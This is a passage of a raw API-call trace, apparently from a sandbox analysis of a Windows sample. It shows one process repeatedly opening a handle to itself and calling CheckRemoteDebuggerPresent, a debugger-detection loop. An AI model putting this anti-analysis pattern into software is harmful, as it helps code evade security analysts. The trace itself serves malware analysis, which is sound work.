bInheritHandle=0, dwProcessId=0x718) returned 0x374 [0192.457] GetExitCodeProcess (in: hProcess=0x374, lpExitCode=0x22a537c | out: lpExitCode=0x22a537c*=0x103) returned 1 [0192.457] CheckRemoteDebuggerPresent (in: hProcess=0x374, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.457] GetCurrentProcessId () returned 0x718 [0192.457] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x378 [0192.458] GetExitCodeProcess (in: hProcess=0x378, lpExitCode=0x22a5434 | out: lpExitCode=0x22a5434*=0x103) returned 1 [0192.458] CheckRemoteDebuggerPresent (in: hProcess=0x378, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.458] GetCurrentProcessId () returned 0x718 [0192.458] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x37c [0192.458] GetExitCodeProcess (in: hProcess=0x37c, lpExitCode=0x22a54ec | out: lpExitCode=0x22a54ec*=0x103) returned 1 [0192.458] CheckRemoteDebuggerPresent (in: hProcess=0x37c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.458] GetCurrentProcessId () returned 0x718 [0192.458] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x380 [0192.458] GetExitCodeProcess (in: hProcess=0x380, lpExitCode=0x22a55a4 | out: lpExitCode=0x22a55a4*=0x103) returned 1 [0192.458] CheckRemoteDebuggerPresent (in: hProcess=0x380, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.458] GetCurrentProcessId () returned 0x718 [0192.458] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x384 [0192.458] GetExitCodeProcess (in: hProcess=0x384, lpExitCode=0x22a565c | out: lpExitCode=0x22a565c*=0x103) returned 1 [0192.459] CheckRemoteDebuggerPresent (in: hProcess=0x384, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.459] GetCurrentProcessId () returned 0x718 [0192.459] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x388 [0192.459] GetExitCodeProcess (in: hProcess=0x388, lpExitCode=0x22a5714 | out: lpExitCode=0x22a5714*=0x103) returned 1 [0192.459] CheckRemoteDebuggerPresent (in: hProcess=0x388, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.459] GetCurrentProcessId () returned 0x718 [0192.459] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x38c [0192.459] GetExitCodeProcess (in: hProcess=0x38c, lpExitCode=0x22a57cc | out: lpExitCode=0x22a57cc*=0x103) returned 1 [0192.459] CheckRemoteDebuggerPresent (in: hProcess=0x38c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.459] GetCurrentProcessId () returned 0x718 [0192.459] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x390 [0192.459] GetExitCodeProcess (in: hProcess=0x390, lpExitCode=0x22a5884 | out: lpExitCode=0x22a5884*=0x103) returned 1 [0192.459] CheckRemoteDebuggerPresent (in: hProcess=0x390, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.460] GetCurrentProcessId () returned 0x718 [0192.460] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x394 [0192.460] GetExitCodeProcess (in: hProcess=0x394, lpExitCode=0x22a593c | out: lpExitCode=0x22a593c*=0x103) returned 1 [0192.460] CheckRemoteDebuggerPresent (in: hProcess=0x394, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.460] GetCurrentProcessId () returned 0x718 [0192.460] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x398 [0192.460] GetExitCodeProcess (in: hProcess=0x398, lpExitCode=0x22a59f4 | out: lpExitCode=0x22a59f4*=0x103) returned 1 [0192.460] CheckRemoteDebuggerPresent (in: hProcess=0x398, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.460] GetCurrentProcessId () returned 0x718 [0192.460] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x39c [0192.460] GetExitCodeProcess (in: hProcess=0x39c, lpExitCode=0x22a5aac | out: lpExitCode=0x22a5aac*=0x103) returned 1 [0192.460] CheckRemoteDebuggerPresent (in: hProcess=0x39c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.460] GetCurrentProcessId () returned 0x718 [0192.460] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x3a0 [0192.461] GetExitCodeProcess (in: hProcess=0x3a0, lpExitCode=0x22a5b64 | out: lpExitCode=0x22a5b64*=0x103) returned 1 [0192.461] CheckRemoteDebuggerPresent (in: hProcess=0x3a0, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.461] GetCurrentProcessId () returned 0x718 [0192.461] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x3a4 [0192.461] GetExitCodeProcess (in: hProcess=0x3a4, lpExitCode=0x22a5c1c | out: lpExitCode=0x22a5c1c*=0x103) returned 1 [0192.461] CheckRemoteDebuggerPresent (in: hProcess=0x3a4, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.461] GetCurrentProcessId () returned 0x718 [0192.461] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x3a8 [0192.461] GetExitCodeProcess (in: hProcess=0x3a8, lpExitCode=0x22a5cd4 | out: lpExitCode=0x22a5cd4*=0x103) returned 1 [0192.461] CheckRemoteDebuggerPresent (in: hProcess=0x3a8, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.461] GetCurrentProcessId () returned 0x718 [0192.461] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x3ac [0192.461] GetExitCodeProcess (in: hProcess=0x3ac, lpExitCode=0x22a5d8c | out: lpExitCode=0x22a5d8c*=0x103) returned 1 [0192.461] CheckRemoteDebuggerPresent (in: hProcess=0x3ac, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.462] GetCurrentProcessId () returned 0x718 [0192.462] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x3b0 [0192.462] GetExitCodeProcess (in: hProcess=0x3b0, lpExitCode=0x22a5e44 | out: lpExitCode=0x22a5e44*=0x103) returned 1 [0192.462] CheckRemoteDebuggerPresent (in: hProcess=0x3b0, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.462] GetCurrentProcessId () returned 0x718 [0192.462] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x3b4 [0192.462] GetExitCodeProcess (in: hProcess=0x3b4, lpExitCode=0x22a5efc | out: lpExitCode=0x22a5efc*=0x103) returned 1 [0192.462] CheckRemoteDebuggerPresent (in: hProcess=0x3b4, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.462] GetCurrentProcessId () returned 0x718 [0192.462] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x3b8 [0192.462] GetExitCodeProcess (in: hProcess=0x3b8, lpExitCode=0x22a5fb4 | out: lpExitCode=0x22a5fb4*=0x103) returned 1 [0192.462] CheckRemoteDebuggerPresent (in: hProcess=0x3b8, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.462] GetCurrentProcessId () returned 0x718 [0192.462] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x3bc [0192.463] GetExitCodeProcess (in: hProcess=0x3bc, lpExitCode=0x22a606c | out: lpExitCode=0x22a606c*=0x103) returned 1 [0192.463] CheckRemoteDebuggerPresent (in: hProcess=0x3bc, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.463] GetCurrentProcessId () returned 0x718 [0192.463] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x3c0 [0192.463] GetExitCodeProcess (in: hProcess=0x3c0, lpExitCode=0x22a6124 | out: lpExitCode=0x22a6124*=0x103) returned 1 [0192.463] CheckRemoteDebuggerPresent (in: hProcess=0x3c0, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.463] GetCurrentProcessId () returned 0x718 [0192.463] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x3c4 [0192.463] GetExitCodeProcess (in: hProcess=0x3c4, lpExitCode=0x22a61dc | out: lpExitCode=0x22a61dc*=0x103) returned 1 [0192.463] CheckRemoteDebuggerPresent (in: hProcess=0x3c4, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.463] GetCurrentProcessId () returned 0x718 [0192.463] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x3c8 [0192.463] GetExitCodeProcess (in: hProcess=0x3c8, lpExitCode=0x22a6294 | out: lpExitCode=0x22a6294*=0x103) returned 1 [0192.464] CheckRemoteDebuggerPresent (in: hProcess=0x3c8, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.464] GetCurrentProcessId () returned 0x718 [0192.464] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x3cc [0192.464] GetExitCodeProcess (in: hProcess=0x3cc, lpExitCode=0x22a634c | out: lpExitCode=0x22a634c*=0x103) returned 1 [0192.464] CheckRemoteDebuggerPresent (in: hProcess=0x3cc, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.464] GetCurrentProcessId () returned 0x718 [0192.464] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x3d0 [0192.464] GetExitCodeProcess (in: hProcess=0x3d0, lpExitCode=0x22a6404 | out: lpExitCode=0x22a6404*=0x103) returned 1 [0192.464] CheckRemoteDebuggerPresent (in: hProcess=0x3d0, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.464] GetCurrentProcessId () returned 0x718 [0192.464] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x3d4 [0192.464] GetExitCodeProcess (in: hProcess=0x3d4, lpExitCode=0x22a64bc | out: lpExitCode=0x22a64bc*=0x103) returned 1 [0192.464] CheckRemoteDebuggerPresent (in: hProcess=0x3d4, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.465] GetCurrentProcessId () returned 0x718 [0192.465] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x3d8 [0192.465] GetExitCodeProcess (in: hProcess=0x3d8, lpExitCode=0x22a6574 | out: lpExitCode=0x22a6574*=0x103) returned 1 [0192.465] CheckRemoteDebuggerPresent (in: hProcess=0x3d8, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.465] GetCurrentProcessId () returned 0x718 [0192.465] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x3dc [0192.465] GetExitCodeProcess (in: hProcess=0x3dc, lpExitCode=0x22a662c | out: lpExitCode=0x22a662c*=0x103) returned 1 [0192.465] CheckRemoteDebuggerPresent (in: hProcess=0x3dc, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.465] GetCurrentProcessId () returned 0x718 [0192.465] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x3e0 [0192.465] GetExitCodeProcess (in: hProcess=0x3e0, lpExitCode=0x22a66e4 | out: lpExitCode=0x22a66e4*=0x103) returned 1 [0192.465] CheckRemoteDebuggerPresent (in: hProcess=0x3e0, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.465] GetCurrentProcessId () returned 0x718 [0192.465] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x3e4 [0192.466] GetExitCodeProcess (in: hProcess=0x3e4, lpExitCode=0x22a679c | out: lpExitCode=0x22a679c*=0x103) returned 1 [0192.466] CheckRemoteDebuggerPresent (in: hProcess=0x3e4, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.466] GetCurrentProcessId () returned 0x718 [0192.466] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x3e8 [0192.466] GetExitCodeProcess (in: hProcess=0x3e8, lpExitCode=0x22a6854 | out: lpExitCode=0x22a6854*=0x103) returned 1 [0192.466] CheckRemoteDebuggerPresent (in: hProcess=0x3e8, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.466] GetCurrentProcessId () returned 0x718 [0192.466] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x3ec [0192.466] GetExitCodeProcess (in: hProcess=0x3ec, lpExitCode=0x22a690c | out: lpExitCode=0x22a690c*=0x103) returned 1 [0192.466] CheckRemoteDebuggerPresent (in: hProcess=0x3ec, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.466] GetCurrentProcessId () returned 0x718 [0192.466] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x3f0 [0192.466] GetExitCodeProcess (in: hProcess=0x3f0, lpExitCode=0x22a69c4 | out: lpExitCode=0x22a69c4*=0x103) returned 1 [0192.467] CheckRemoteDebuggerPresent (in: hProcess=0x3f0, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.467] GetCurrentProcessId () returned 0x718 [0192.467] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x3f4 [0192.467] GetExitCodeProcess (in: hProcess=0x3f4, lpExitCode=0x22a6a7c | out: lpExitCode=0x22a6a7c*=0x103) returned 1 [0192.467] CheckRemoteDebuggerPresent (in: hProcess=0x3f4, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.467] GetCurrentProcessId () returned 0x718 [0192.467] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x3f8 [0192.467] GetExitCodeProcess (in: hProcess=0x3f8, lpExitCode=0x22a6b34 | out: lpExitCode=0x22a6b34*=0x103) returned 1 [0192.467] CheckRemoteDebuggerPresent (in: hProcess=0x3f8, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.467] GetCurrentProcessId () returned 0x718 [0192.467] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x3fc [0192.467] GetExitCodeProcess (in: hProcess=0x3fc, lpExitCode=0x22a6bec | out: lpExitCode=0x22a6bec*=0x103) returned 1 [0192.467] CheckRemoteDebuggerPresent (in: hProcess=0x3fc, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.468] GetCurrentProcessId () returned 0x718 [0192.468] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x404 [0192.468] GetExitCodeProcess (in: hProcess=0x404, lpExitCode=0x22a6ca4 | out: lpExitCode=0x22a6ca4*=0x103) returned 1 [0192.468] CheckRemoteDebuggerPresent (in: hProcess=0x404, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.468] GetCurrentProcessId () returned 0x718 [0192.468] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x408 [0192.468] GetExitCodeProcess (in: hProcess=0x408, lpExitCode=0x22a6d5c | out: lpExitCode=0x22a6d5c*=0x103) returned 1 [0192.468] CheckRemoteDebuggerPresent (in: hProcess=0x408, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.468] GetCurrentProcessId () returned 0x718 [0192.468] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x40c [0192.468] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x22a6e14 | out: lpExitCode=0x22a6e14*=0x103) returned 1 [0192.468] CheckRemoteDebuggerPresent (in: hProcess=0x40c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.469] GetCurrentProcessId () returned 0x718 [0192.469] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x410 [0192.469] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x22a6ecc | out: lpExitCode=0x22a6ecc*=0x103) returned 1 [0192.469] CheckRemoteDebuggerPresent (in: hProcess=0x410, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.469] GetCurrentProcessId () returned 0x718 [0192.469] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x414 [0192.469] GetExitCodeProcess (in: hProcess=0x414, lpExitCode=0x22a6f84 | out: lpExitCode=0x22a6f84*=0x103) returned 1 [0192.469] CheckRemoteDebuggerPresent (in: hProcess=0x414, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.469] GetCurrentProcessId () returned 0x718 [0192.469] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x418 [0192.469] GetExitCodeProcess (in: hProcess=0x418, lpExitCode=0x22a703c | out: lpExitCode=0x22a703c*=0x103) returned 1 [0192.469] CheckRemoteDebuggerPresent (in: hProcess=0x418, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.469] GetCurrentProcessId () returned 0x718 [0192.469] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x41c [0192.470] GetExitCodeProcess (in: hProcess=0x41c, lpExitCode=0x22a70f4 | out: lpExitCode=0x22a70f4*=0x103) returned 1 [0192.470] CheckRemoteDebuggerPresent (in: hProcess=0x41c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.470] GetCurrentProcessId () returned 0x718 [0192.470] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x420 [0192.470] GetExitCodeProcess (in: hProcess=0x420, lpExitCode=0x22a71ac | out: lpExitCode=0x22a71ac*=0x103) returned 1 [0192.470] CheckRemoteDebuggerPresent (in: hProcess=0x420, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.470] GetCurrentProcessId () returned 0x718 [0192.470] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x424 [0192.470] GetExitCodeProcess (in: hProcess=0x424, lpExitCode=0x22a7264 | out: lpExitCode=0x22a7264*=0x103) returned 1 [0192.470] CheckRemoteDebuggerPresent (in: hProcess=0x424, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.470] GetCurrentProcessId () returned 0x718 [0192.470] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x428 [0192.470] GetExitCodeProcess (in: hProcess=0x428, lpExitCode=0x22a731c | out: lpExitCode=0x22a731c*=0x103) returned 1 [0192.471] CheckRemoteDebuggerPresent (in: hProcess=0x428, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.471] GetCurrentProcessId () returned 0x718 [0192.471] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x42c [0192.471] GetExitCodeProcess (in: hProcess=0x42c, lpExitCode=0x22a73d4 | out: lpExitCode=0x22a73d4*=0x103) returned 1 [0192.471] CheckRemoteDebuggerPresent (in: hProcess=0x42c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.471] GetCurrentProcessId () returned 0x718 [0192.471] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x430 [0192.471] GetExitCodeProcess (in: hProcess=0x430, lpExitCode=0x22a748c | out: lpExitCode=0x22a748c*=0x103) returned 1 [0192.471] CheckRemoteDebuggerPresent (in: hProcess=0x430, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.471] GetCurrentProcessId () returned 0x718 [0192.471] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x434 [0192.471] GetExitCodeProcess (in: hProcess=0x434, lpExitCode=0x22a7544 | out: lpExitCode=0x22a7544*=0x103) returned 1 [0192.471] CheckRemoteDebuggerPresent (in: hProcess=0x434, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.472] GetCurrentProcessId () returned 0x718 [0192.472] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x438 [0192.472] GetExitCodeProcess (in: hProcess=0x438, lpExitCode=0x22a75fc | out: lpExitCode=0x22a75fc*=0x103) returned 1 [0192.472] CheckRemoteDebuggerPresent (in: hProcess=0x438, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.472] GetCurrentProcessId () returned 0x718 [0192.472] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x43c [0192.472] GetExitCodeProcess (in: hProcess=0x43c, lpExitCode=0x22a76b4 | out: lpExitCode=0x22a76b4*=0x103) returned 1 [0192.472] CheckRemoteDebuggerPresent (in: hProcess=0x43c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.473] GetExitCodeProcess (in: hProcess=0x440, lpExitCode=0x22a776c | out: lpExitCode=0x22a776c*=0x103) returned 1 [0192.473] CheckRemoteDebuggerPresent (in: hProcess=0x440, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.473] GetExitCodeProcess (in: hProcess=0x444, lpExitCode=0x22a7824 | out: lpExitCode=0x22a7824*=0x103) returned 1 [0192.473] CheckRemoteDebuggerPresent (in: hProcess=0x444, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.473] GetExitCodeProcess (in: hProcess=0x448, lpExitCode=0x22a78dc | out: lpExitCode=0x22a78dc*=0x103) returned 1 [0192.473] CheckRemoteDebuggerPresent (in: hProcess=0x448, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.473] GetExitCodeProcess (in: hProcess=0x44c, lpExitCode=0x22a7994 | out: lpExitCode=0x22a7994*=0x103) returned 1 [0192.473] CheckRemoteDebuggerPresent (in: hProcess=0x44c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.473] GetExitCodeProcess (in: hProcess=0x450, lpExitCode=0x22a7a4c | out: lpExitCode=0x22a7a4c*=0x103) returned 1 [0192.473] CheckRemoteDebuggerPresent (in: hProcess=0x450, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.474] GetExitCodeProcess (in: hProcess=0x454, lpExitCode=0x22a7b04 | out: lpExitCode=0x22a7b04*=0x103) returned 1 [0192.474] CheckRemoteDebuggerPresent (in: hProcess=0x454, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.474] GetExitCodeProcess (in: hProcess=0x458, lpExitCode=0x22a7bbc | out: lpExitCode=0x22a7bbc*=0x103) returned 1 [0192.474] CheckRemoteDebuggerPresent (in: hProcess=0x458, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.474] GetExitCodeProcess (in: hProcess=0x45c, lpExitCode=0x22a7c74 | out: lpExitCode=0x22a7c74*=0x103) returned 1 [0192.474] CheckRemoteDebuggerPresent (in: hProcess=0x45c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.474] GetExitCodeProcess (in: hProcess=0x460, lpExitCode=0x22a7d2c | out: lpExitCode=0x22a7d2c*=0x103) returned 1 [0192.474] CheckRemoteDebuggerPresent (in: hProcess=0x460, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.474] GetExitCodeProcess (in: hProcess=0x464, lpExitCode=0x22a7de4 | out: lpExitCode=0x22a7de4*=0x103) returned 1 [0192.474] CheckRemoteDebuggerPresent (in: hProcess=0x464, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.474] GetExitCodeProcess (in: hProcess=0x468, lpExitCode=0x22a7e9c | out: lpExitCode=0x22a7e9c*=0x103) returned 1 [0192.474] CheckRemoteDebuggerPresent (in: hProcess=0x468, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.475] GetExitCodeProcess (in: hProcess=0x46c, lpExitCode=0x22a7f54 | out: lpExitCode=0x22a7f54*=0x103) returned 1 [0192.475] CheckRemoteDebuggerPresent (in: hProcess=0x46c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.475] GetExitCodeProcess (in: hProcess=0x470, lpExitCode=0x22a800c | out: lpExitCode=0x22a800c*=0x103) returned 1 [0192.475] CheckRemoteDebuggerPresent (in: hProcess=0x470, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.475] GetExitCodeProcess (in: hProcess=0x474, lpExitCode=0x22a80c4 | out: lpExitCode=0x22a80c4*=0x103) returned 1 [0192.475] CheckRemoteDebuggerPresent (in: hProcess=0x474, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.475] GetExitCodeProcess (in: hProcess=0x478, lpExitCode=0x22a81b8 | out: lpExitCode=0x22a81b8*=0x103) returned 1 [0192.475] CheckRemoteDebuggerPresent (in: hProcess=0x478, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.475] GetExitCodeProcess (in: hProcess=0x47c, lpExitCode=0x22a8270 | out: lpExitCode=0x22a8270*=0x103) returned 1 [0192.475] CheckRemoteDebuggerPresent (in: hProcess=0x47c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.475] GetExitCodeProcess (in: hProcess=0x480, lpExitCode=0x22a8328 | out: lpExitCode=0x22a8328*=0x103) returned 1 [0192.476] CheckRemoteDebuggerPresent (in: hProcess=0x480, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.476] GetExitCodeProcess (in: hProcess=0x484, lpExitCode=0x22a83e0 | out: lpExitCode=0x22a83e0*=0x103) returned 1 [0192.476] CheckRemoteDebuggerPresent (in: hProcess=0x484, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.476] GetExitCodeProcess (in: hProcess=0x488, lpExitCode=0x22a8498 | out: lpExitCode=0x22a8498*=0x103) returned 1 [0192.476] CheckRemoteDebuggerPresent (in: hProcess=0x488, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.476] GetExitCodeProcess (in: hProcess=0x48c, lpExitCode=0x22a8550 | out: lpExitCode=0x22a8550*=0x103) returned 1 [0192.476] CheckRemoteDebuggerPresent (in: hProcess=0x48c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.476] GetExitCodeProcess (in: hProcess=0x490, lpExitCode=0x22a8608 | out: lpExitCode=0x22a8608*=0x103) returned 1 [0192.476] CheckRemoteDebuggerPresent (in: hProcess=0x490, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.476] GetExitCodeProcess (in: hProcess=0x494, lpExitCode=0x22a86c0 | out: lpExitCode=0x22a86c0*=0x103) returned 1 [0192.476] CheckRemoteDebuggerPresent (in: hProcess=0x494, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.476] GetExitCodeProcess (in: hProcess=0x498, lpExitCode=0x22a8778 | out: lpExitCode=0x22a8778*=0x103) returned 1 [0192.477] CheckRemoteDebuggerPresent (in: hProcess=0x498, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.477] GetExitCodeProcess (in: hProcess=0x49c, lpExitCode=0x22a8830 | out: lpExitCode=0x22a8830*=0x103) returned 1 [0192.477] CheckRemoteDebuggerPresent (in: hProcess=0x49c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.477] 